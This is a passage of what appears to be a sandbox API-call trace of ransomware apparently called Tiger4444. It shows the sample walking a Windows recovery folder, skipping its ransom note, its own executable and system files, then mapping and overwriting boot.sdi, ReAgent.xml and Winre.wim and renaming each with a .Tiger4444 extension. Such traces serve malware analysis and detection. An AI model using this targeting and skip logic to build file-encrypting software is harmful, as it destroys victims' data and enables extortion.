(HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0039.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0039.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752e8 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752e8 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75388 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75388 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752e8 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752e8 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0039.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0039.032] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752e8 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752e8 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75398 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75398 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753d8 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753d8 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75308 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0039.033] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0039.033] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75348 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75348 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753b8 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753b8 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75348 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75348 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75348 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75348 | out: hHeap=0xc50000) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0039.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0039.072] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0039.072] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0039.072] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753b8 [0039.072] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753b8 | out: hHeap=0xc50000) returned 1 [0039.072] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0039.072] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0039.072] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0039.072] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0039.072] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0039.072] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0039.072] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0039.072] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0039.072] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8c2d0 | out: hHeap=0xc50000) returned 1 [0039.072] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8c6f8 | out: hHeap=0xc50000) returned 1 [0039.072] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8c4e0 | out: hHeap=0xc50000) returned 1 [0039.072] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8c908 | out: hHeap=0xc50000) returned 1 [0039.072] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73d50 | out: hHeap=0xc50000) returned 1 [0039.073] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0039.073] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0039.073] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0039.073] QueryPerformanceCounter (in: lpPerformanceCount=0x2fac0f8 | out: lpPerformanceCount=0x2fac0f8*=13052588038) returned 1 [0039.073] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765e8 | out: hHeap=0xc50000) returned 1 [0039.073] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0039.073] UnmapViewOfFile (lpBaseAddress=0x30b0000) returned 1 [0039.082] CloseHandle (hObject=0x2b8) returned 1 [0039.082] CloseHandle (hObject=0x2a8) returned 1 [0039.082] wsprintfW (in: param_1=0x2fac3f8, param_2="%s.%s" | out: param_1="Z:\\Recovery\\WindowsRE\\boot.sdi.Tiger4444") returned 40 [0039.082] MoveFileExW (lpExistingFileName="Z:\\Recovery\\WindowsRE\\boot.sdi" (normalized: "z:\\recovery\\windowsre\\boot.sdi"), lpNewFileName="Z:\\Recovery\\WindowsRE\\boot.sdi.Tiger4444" (normalized: "z:\\recovery\\windowsre\\boot.sdi.tiger4444"), dwFlags=0x1) returned 1 [0039.082] InterlockedExchangeAdd (in: Addend=0xc6f5e8, Value=3170304 | out: Addend=0xc6f5e8) returned 0 [0039.082] InterlockedExchangeAdd (in: Addend=0xc6f5f4, Value=635 | out: Addend=0xc6f5f4) returned 0 [0039.082] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x2fae118 | out: lpFindFileData=0x2fae118*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x80a0471e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x80a0471e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x43d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReAgent.xml", cAlternateFileName="")) returned 1 [0039.082] lstrcmpiW (lpString1="ReAgent.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0039.082] lstrcmpiW (lpString1="ReAgent.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0039.083] lstrcmpiW (lpString1="ReAgent.xml", lpString2="Tiger4444.exe") returned -1 [0039.083] lstrcmpiW (lpString1="ReAgent.xml", lpString2=".") returned 1 [0039.083] lstrcmpiW (lpString1="ReAgent.xml", lpString2="..") returned 1 [0039.083] lstrcmpiW (lpString1="ReAgent.xml", lpString2="windows") returned -1 [0039.083] lstrcmpiW (lpString1="ReAgent.xml", lpString2="bootmgr") returned 1 [0039.083] lstrcmpiW (lpString1="ReAgent.xml", lpString2="pagefile.sys") returned 1 [0039.083] lstrcmpiW (lpString1="ReAgent.xml", lpString2="boot") returned 1 [0039.083] lstrcmpiW (lpString1="ReAgent.xml", lpString2="ids.txt") returned 1 [0039.083] lstrcmpiW (lpString1="ReAgent.xml", lpString2="NTUSER.DAT") returned 1 [0039.083] lstrcpyW (in: lpString1=0x2faec94, lpString2="ReAgent.xml" | out: lpString1="ReAgent.xml") returned="ReAgent.xml" [0039.083] SetFileAttributesW (lpFileName="Z:\\Recovery\\WindowsRE\\ReAgent.xml", dwFileAttributes=0x2002) returned 1 [0039.083] lstrlenW (lpString="ReAgent.xml") returned 11 [0039.083] lstrlenW (lpString="Tiger4444") returned 9 [0039.083] lstrcmpiW (lpString1="Agent.xml", lpString2="Tiger4444") returned -1 [0039.083] lstrlenW (lpString=".dll") returned 4 [0039.083] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0039.083] lstrlenW (lpString=".lnk") returned 4 [0039.083] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0039.083] lstrlenW (lpString=".ini") returned 4 [0039.083] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0039.083] lstrlenW (lpString=".sys") returned 4 [0039.083] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0039.083] CreateFileW (lpFileName="Z:\\Recovery\\WindowsRE\\ReAgent.xml" (normalized: "z:\\recovery\\windowsre\\reagent.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a8 [0039.083] QueryPerformanceFrequency (in: lpFrequency=0x2fac0e8 | out: lpFrequency=0x2fac0e8*=100000000) returned 1 [0039.083] QueryPerformanceCounter (in: lpPerformanceCount=0x2fac0f0 | out: lpPerformanceCount=0x2fac0f0*=13053643988) returned 1 [0039.083] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2fac148 | out: lpFileSize=0x2fac148*=1085) returned 1 [0039.083] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0039.083] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0039.084] CreateFileMappingW (hFile=0x2a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x2b8 [0039.084] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0xc20000 [0039.089] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0039.089] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0039.089] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0039.089] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0039.089] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0039.089] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0039.089] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0039.089] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0039.089] QueryPerformanceCounter (in: lpPerformanceCount=0x2fac0f8 | out: lpPerformanceCount=0x2fac0f8*=13054242795) returned 1 [0039.089] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0039.089] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0039.089] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0039.090] CloseHandle (hObject=0x2b8) returned 1 [0039.090] CloseHandle (hObject=0x2a8) returned 1 [0039.090] wsprintfW (in: param_1=0x2fac3f8, param_2="%s.%s" | out: param_1="Z:\\Recovery\\WindowsRE\\ReAgent.xml.Tiger4444") returned 43 [0039.090] MoveFileExW (lpExistingFileName="Z:\\Recovery\\WindowsRE\\ReAgent.xml" (normalized: "z:\\recovery\\windowsre\\reagent.xml"), lpNewFileName="Z:\\Recovery\\WindowsRE\\ReAgent.xml.Tiger4444" (normalized: "z:\\recovery\\windowsre\\reagent.xml.tiger4444"), dwFlags=0x1) returned 1 [0039.090] InterlockedExchangeAdd (in: Addend=0xc6f5e8, Value=1088 | out: Addend=0xc6f5e8) returned 3170304 [0039.090] InterlockedExchangeAdd (in: Addend=0xc6f5f4, Value=5 | out: Addend=0xc6f5f4) returned 635 [0039.090] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x2fae118 | out: lpFindFileData=0x2fae118*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1e3d62eb, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x419711a, ftLastWriteTime.dwHighDateTime=0x1d32795, nFileSizeHigh=0x0, nFileSizeLow=0x1d4fedd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0039.090] lstrcmpiW (lpString1="Winre.wim", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0039.090] lstrcmpiW (lpString1="Winre.wim", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0039.090] lstrcmpiW (lpString1="Winre.wim", lpString2="Tiger4444.exe") returned 1 [0039.090] lstrcmpiW (lpString1="Winre.wim", lpString2=".") returned 1 [0039.090] lstrcmpiW (lpString1="Winre.wim", lpString2="..") returned 1 [0039.090] lstrcmpiW (lpString1="Winre.wim", lpString2="windows") returned 1 [0039.090] lstrcmpiW (lpString1="Winre.wim", lpString2="bootmgr") returned 1 [0039.090] lstrcmpiW (lpString1="Winre.wim", lpString2="pagefile.sys") returned 1 [0039.090] lstrcmpiW (lpString1="Winre.wim", lpString2="boot") returned 1 [0039.090] lstrcmpiW (lpString1="Winre.wim", lpString2="ids.txt") returned 1 [0039.090] lstrcmpiW (lpString1="Winre.wim", lpString2="NTUSER.DAT") returned 1 [0039.090] lstrcpyW (in: lpString1=0x2faec94, lpString2="Winre.wim" | out: lpString1="Winre.wim") returned="Winre.wim" [0039.090] SetFileAttributesW (lpFileName="Z:\\Recovery\\WindowsRE\\Winre.wim", dwFileAttributes=0x2002) returned 1 [0039.091] lstrlenW (lpString="Winre.wim") returned 9 [0039.091] lstrlenW (lpString="Tiger4444") returned 9 [0039.091] lstrcmpiW (lpString1="Winre.wim", lpString2="Tiger4444") returned 1 [0039.091] lstrlenW (lpString=".dll") returned 4 [0039.091] lstrcmpiW (lpString1=".wim", lpString2=".dll") returned 1 [0039.091] lstrlenW (lpString=".lnk") returned 4 [0039.091] lstrcmpiW (lpString1=".wim", lpString2=".lnk") returned 1 [0039.091] lstrlenW (lpString=".ini") returned 4 [0039.091] lstrcmpiW (lpString1=".wim", lpString2=".ini") returned 1 [0039.091] lstrlenW (lpString=".sys") returned 4 [0039.091] lstrcmpiW (lpString1=".wim", lpString2=".sys") returned 1 [0039.091] CreateFileW (lpFileName="Z:\\Recovery\\WindowsRE\\Winre.wim" (normalized: "z:\\recovery\\windowsre\\winre.wim"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a8 [0039.091] QueryPerformanceFrequency (in: lpFrequency=0x2fac0e8 | out: lpFrequency=0x2fac0e8*=100000000) returned 1 [0039.091] QueryPerformanceCounter (in: lpPerformanceCount=0x2fac0f0 | out: lpPerformanceCount=0x2fac0f0*=13054410420) returned 1 [0039.091] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2fac148 | out: lpFileSize=0x2fac148*=491777489) returned 1 [0039.091] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0039.091] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0039.091] CreateFileMappingW (hFile=0x2a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d4ff0e0, lpName=0x0) returned 0x2b8 [0039.092] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1d400000, dwNumberOfBytesToMap=0xff0e0) returned 0x30b0000 [0039.417] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x31b0000 [0039.765] UnmapViewOfFile (lpBaseAddress=0x31b0000) returned 1 [0039.781] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x7400000, dwNumberOfBytesToMap=0x200000) returned 0x31b0000 [0040.075] UnmapViewOfFile (lpBaseAddress=0x31b0000) returned 1 [0040.282] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xe800000, dwNumberOfBytesToMap=0x200000) returned 0x31b0000 [0040.612] UnmapViewOfFile (lpBaseAddress=0x31b0000) returned 1 [0041.006] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x15c00000, dwNumberOfBytesToMap=0x200000) returned 0x31b0000 [0041.067] UnmapViewOfFile (lpBaseAddress=0x31b0000) returned 1 [0041.113] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1d000000, dwNumberOfBytesToMap=0x200000) returned 0x31b0000 [0041.202] UnmapViewOfFile (lpBaseAddress=0x31b0000) returned 1 [0041.219] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0041.219] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0041.219] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0041.219] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0041.219] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0041.259] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0041.259] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0041.259] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0041.259] QueryPerformanceCounter (in: lpPerformanceCount=0x2fac0f8 | out: lpPerformanceCount=0x2fac0f8*=13271253356) returned 1 [0041.260] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0041.260] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0041.260] UnmapViewOfFile (lpBaseAddress=0x30b0000) returned 1 [0041.272] CloseHandle (hObject=0x2b8) returned 1 [0041.272] CloseHandle (hObject=0x2a8) returned 1 [0041.272] wsprintfW (in: param_1=0x2fac3f8, param_2="%s.%s" | out: param_1="Z:\\Recovery\\WindowsRE\\Winre.wim.Tiger4444") returned 41 [0041.273] MoveFileExW (lpExistingFileName="Z:\\Recovery\\WindowsRE\\Winre.wim" (normalized: 